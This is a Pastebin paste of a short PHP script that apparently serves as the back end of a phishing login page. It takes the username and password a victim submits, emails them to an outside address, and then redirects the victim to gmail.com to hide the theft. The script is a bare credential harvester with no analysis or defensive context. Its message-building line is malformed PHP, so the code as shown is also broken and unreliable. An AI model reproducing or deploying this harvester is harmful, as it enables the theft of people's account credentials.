Advertisement
Guest User

Untitled

a guest
Jul 29th, 2016
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.31 KB | None | 0 0
  1. <?php
  2. if(isset($_POST['submit'])){
  3. $to = "salut@bagaiacimailu.com";
  4. $username = $_POST['username'];
  5. $password = $_POST['password'];
  6. $subject = "You got mail!";
  7. $message = "$username . " "$password . ";
  8. mail($to,$subject,$message);
  9. }
  10. header ("Location: https://www.gmail.com");
  11. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement